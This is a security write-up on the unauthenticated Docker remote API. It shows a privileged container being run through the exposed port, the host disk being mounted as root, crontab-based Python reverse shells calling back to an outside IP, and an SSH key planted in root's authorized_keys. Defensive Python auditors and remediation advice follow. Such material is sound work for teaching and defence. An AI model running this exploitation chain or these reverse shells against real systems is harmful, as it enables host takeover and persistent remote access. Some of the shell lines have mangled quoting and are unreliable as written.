0x00 Vulnerability overview
The Docker remote API unauthenticated access vulnerability. This API is meant to replace the command-line interface: when the daemon is configured to listen on port 2375, the API is exposed there, which makes managing and scaling Docker clusters convenient.
0x01 Body
Verifying that the vulnerability exists
Browse directly to http://your-ip:2375/version (the port may differ depending on the configuration). If the page can be accessed, the unauthenticated access vulnerability is present.
Testing reachability
┌──(kali㉿kali)-[~/Desktop]
└─$ ping 192.168.249.202
PING 192.168.249.202 (192.168.249.202) 56(84) bytes of data.
64 bytes from 192.168.249.202: icmp_seq=1 ttl=128 time=1.97 ms
64 bytes from 192.168.249.202: icmp_seq=2 ttl=128 time=2.26 ms
^C
--- 192.168.249.202 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 1.971/2.116/2.261/0.145 ms
┌──(kali㉿kali)-[~/Desktop]
└─$ docker -H tcp://192.168.249.202:5555 ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAME
Common Docker management commands
docker -H tcp:
docker -H tcp:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# docker -H tcp://192.168.249.202:5555 pull alpine
Using default tag: latest
latest: Pulling from library/alpine
Digest: sha256:bc41182d7ef5ffc53a40b044e725193bc10142a1243f395ee852a8d9730fc2ad
Status: Image is up to date for alpine:latest
docker.io/library/alpine:latest
┌──(root㉿kali)-[/home/kali/Desktop]
└─# docker -H tcp://192.168.249.202:5555 run -it --privileged alpine bin/sh
/ # ls
bin etc lib mnt proc run srv tmp var
dev home media opt root sbin sys usr
/ # ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:02
inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:656 (656.0 B) TX bytes:0 (0.0 B)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Mounting the sda2 disk
/ # fdisk -l
Disk /dev/sda: 894 GB, 960197124096 bytes, 1875385008 sectors
116737 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Device Boot StartCHS EndCHS StartLBA EndLBA Sectors Size Id Type
/dev/sda1 0,32,33 522,75,1 2048 8390655 8388608 4096M 82 Linux swap
/dev/sda2 * 522,75,2 1023,254,63 8390656 1875378175 1866987520 890G 83 Linux
Disk /dev/sdb: 894 GB, 960197124096 bytes, 1875385008 sectors
116737 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/sdb doesn't contain a valid partition table
Disk /dev/sdf: 1863 GB, 2000398934016 bytes, 3907029168 sectors
243201 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/sdf doesn't contain a valid partition table
Disk /dev/sdd: 1863 GB, 2000398934016 bytes, 3907029168 sectors
243201 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/sdd doesn't contain a valid partition table
Disk /dev/sdc: 1863 GB, 2000398934016 bytes, 3907029168 sectors
243201 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/sdc doesn't contain a valid partition table
Disk /dev/sde: 1863 GB, 2000398934016 bytes, 3907029168 sectors
243201 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/sde doesn't contain a valid partition table
Disk /dev/dm-0: 1863 GB, 2000381018112 bytes, 3906994176 sectors
243199 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-0 doesn't contain a valid partition table
Disk /dev/dm-1: 1863 GB, 2000381018112 bytes, 3906994176 sectors
243199 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-1 doesn't contain a valid partition table
Disk /dev/dm-2: 1863 GB, 2000381018112 bytes, 3906994176 sectors
243199 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-2 doesn't contain a valid partition table
Disk /dev/dm-3: 894 GB, 960181043200 bytes, 1875353600 sectors
116735 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-3 doesn't contain a valid partition table
Disk /dev/dm-4: 1863 GB, 2000381018112 bytes, 3906994176 sectors
243199 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-4 doesn't contain a valid partition table
/ # mkdir test
/ # ls
bin etc lib mnt proc run srv test usr
dev home media opt root sbin sys tmp var
/ # mount /dev/sda2 test
/ # cd test
/test # whoami
root
/test # touch just.txt
/test # ls
bin home lib64 log-2022-04 log-2022-08 proc srv var
boot iDiscovery log-2021-09 log-2022-05 media root sys
dev just.txt log-2021-11 log-2022-06 mnt run tmp
etc lib log-2021-12 log-2022-07 opt sbin usr
// At this point sda2 is mounted under test
Attempting a reverse shell
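The walkthrough above relies on a container started with --privileged, which is what makes the host's block devices mountable from inside it. As an added example (not part of the original write-up), the Python below audits the JSON that `docker inspect` prints for running containers and flags exactly that pattern: privileged mode, the host PID namespace, host device passthrough, or bind mounts of sensitive host paths. The sample inspect records are constructed; the field names (HostConfig.Privileged, HostConfig.Devices, HostConfig.PidMode, Mounts) are the real Docker Engine ones, and the live audit assumes the docker CLI is on PATH.

```python
import json
import subprocess
from typing import Any

# Constructed sample in the shape of `docker inspect` output: the privileged
# alpine container from the walkthrough, a container with the host root bind
# mounted, and an ordinary app container using a named volume.
SAMPLE_INSPECT = json.dumps([
    {"Id": "0123456789ab", "Name": "/hungry_ride", "Config": {"Image": "alpine"},
     "HostConfig": {"Privileged": True, "Devices": [], "PidMode": ""},
     "Mounts": []},
    {"Id": "fedcba987654", "Name": "/web", "Config": {"Image": "nginx"},
     "HostConfig": {"Privileged": False, "Devices": [], "PidMode": ""},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host"}]},
    {"Id": "aaaaaaaaaaaa", "Name": "/app", "Config": {"Image": "myapp:1.0"},
     "HostConfig": {"Privileged": False, "Devices": [], "PidMode": ""},
     "Mounts": [{"Type": "volume", "Source": "appdata", "Destination": "/data"}]},
])

# Host paths whose bind mount hands the container the host's identity or state.
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/var/run/docker.sock", "/dev", "/proc", "/sys")


def is_sensitive_host_path(path: str) -> bool:
    """True for the host root or anything at/under a sensitive host path."""
    if path == "/":
        return True
    return any(path == p or path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def risk_findings(container: dict[str, Any]) -> list[str]:
    """Reasons one inspect record matches the host-takeover pattern above."""
    hc = container.get("HostConfig") or {}
    findings: list[str] = []
    if hc.get("Privileged"):
        # --privileged grants every capability and raw access to host block
        # devices, which is what let `mount /dev/sda2` succeed in the write-up.
        findings.append("privileged")
    if hc.get("PidMode") == "host":
        findings.append("host pid namespace")
    for dev in hc.get("Devices") or []:
        findings.append(f"host device {dev.get('PathOnHost')}")
    for m in container.get("Mounts") or []:
        if m.get("Type") == "bind" and is_sensitive_host_path(m.get("Source", "")):
            findings.append(f"bind mount of {m['Source']}")
    return findings


def audit_inspect_output(raw_json: str) -> dict[str, list[str]]:
    """Map container name -> findings, for the containers that have any."""
    return {c["Name"].lstrip("/"): f for c in json.loads(raw_json) if (f := risk_findings(c))}


def audit_daemon(host: str) -> dict[str, list[str]]:
    """Run the audit against a live daemon; assumes the docker CLI is on PATH."""
    def run(*args: str) -> str:
        return subprocess.run(["docker", "-H", host, *args],
                              capture_output=True, text=True, check=True).stdout
    ids = run("ps", "-q").split()
    return audit_inspect_output(run("inspect", *ids)) if ids else {}


if __name__ == "__main__":
    # Against a real host: audit_daemon("tcp://192.168.249.202:5555")
    print(json.dumps(audit_inspect_output(SAMPLE_INSPECT), indent=2))
```

Run it on a schedule against each daemon in the inventory and alert on any non-empty result; a privileged container or a bind mount of / on a host that never runs such workloads is the clearest post-exploitation signal of the scenario above.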
(crontab -l;printf " * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.130",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'n")|crontab -
echo "*/1 * * * * root python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.130",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'" >> /test/etc/crontab
None of the above attempts produced a callback; after much head-scratching, it turned out that the target machine has no outbound access from its internal network...
Trying again with a VPS
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsYNh4bLNmhQ7Cu64zYsIrxYWyEGz2dbd2B4s+SeX0h7c2p1UboZ1IUB60D3R05pExRcIxbX+P7k3PSeCnHHJG6JSqiahPxR7+J+sCvVr4Ki6inP87P8kpIRmXR2iTnIm5+Q/1cuxGgdF9ut6mBfUA4G8HV0AGhdsyaO6HdeS5iVYyc3tNfKDaZPqXi0UA6RPXDfhO9AfxUYn+sbHkJqTP9sI/4yRr+lN9UquyCGc03my16wThgSUp5aXxJqkpOuzSjHxBcsHWKFB/FfQVIGqDJuqU01V13NuL23ag8aDL root@" > /root/.ssh/authorized_keys
ssh root@IP -i id_rsa
0x02 Remediation
Configure an ACL so that only trusted IP addresses can connect to the corresponding port
Enable TLS and authenticate clients with generated certificates
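As an added example (not from the original write-up) of checking the two fixes, the Python below audits a daemon.json for a TCP listener that lacks tlsverify and classifies what a plaintext GET /version returns, so a host inventory can be swept for the exposed state described at the start of the page. The daemon.json keys are the documented dockerd ones (hosts, tlsverify, tlscacert, tlscert, tlskey); the sample configs, the certificate paths and the 10.0.0.5 management address are constructed assumptions. The "tls required" classification relies on Go's HTTP server, which dockerd uses, answering a plaintext request on a TLS listener with a 400 "Client sent an HTTP request to an HTTPS server".

```python
import http.client
import json
from typing import Optional

# Constructed sample configs. The weak one is how the daemon in the write-up
# is typically exposed; the hardened one listens on a single management
# address (assumed 10.0.0.5) and requires client certificates signed by the
# CA at the assumed paths below.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/certs/ca.pem",
    "tlscert": "/etc/docker/certs/server-cert.pem",
    "tlskey": "/etc/docker/certs/server-key.pem",
})


def audit_daemon_json(raw: str) -> list[str]:
    """Findings for a daemon.json; an empty list means the TCP side is fine."""
    cfg = json.loads(raw)
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    findings: list[str] = []
    if not tcp_hosts:
        return findings  # unix socket only: nothing reachable over the network
    if not cfg.get("tlsverify"):
        findings.append("tcp listener without tlsverify: any client that reaches the port is root on the host")
    elif not all(cfg.get(k) for k in ("tlscacert", "tlscert", "tlskey")):
        findings.append("tlsverify set but tlscacert/tlscert/tlskey are incomplete")
    for h in tcp_hosts:
        if "0.0.0.0" in h or "[::]" in h:
            findings.append(f"{h} listens on every interface: bind a management address and firewall the port")
    return findings


def classify_version_response(status: Optional[int], body: str) -> str:
    """Interpret what a plaintext GET /version got back from the port."""
    if status is None:
        return "unreachable"
    if status == 200:
        try:
            info = json.loads(body)
        except ValueError:
            return "unknown"
        if isinstance(info, dict) and ("ApiVersion" in info or "Version" in info):
            return "unauthenticated docker api"  # the vulnerable state from the write-up
        return "unknown"
    if status == 400 and "HTTPS" in body:
        # A TLS-only dockerd rejects plaintext with this Go net/http message.
        return "tls required"
    return "unknown"


def probe(host: str, port: int = 2375, timeout: float = 3.0) -> str:
    """Send the same plaintext GET /version the write-up uses and classify it."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", "/version")
        resp = conn.getresponse()
        return classify_version_response(resp.status, resp.read().decode(errors="replace"))
    except (OSError, http.client.HTTPException):
        return classify_version_response(None, "")
    finally:
        conn.close()


if __name__ == "__main__":
    for name, raw in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(name, audit_daemon_json(raw) or "ok")
    # Against a real host in the inventory: print(probe("192.168.249.202", 5555))
```

A host that reports "tls required" on 2376 and "unreachable" on 2375 from an untrusted network, and whose daemon.json audits clean, has both recommendations in place; note that `-H` flags on the dockerd command line override the hosts key, so the audit should be run on whichever source actually configures the daemon.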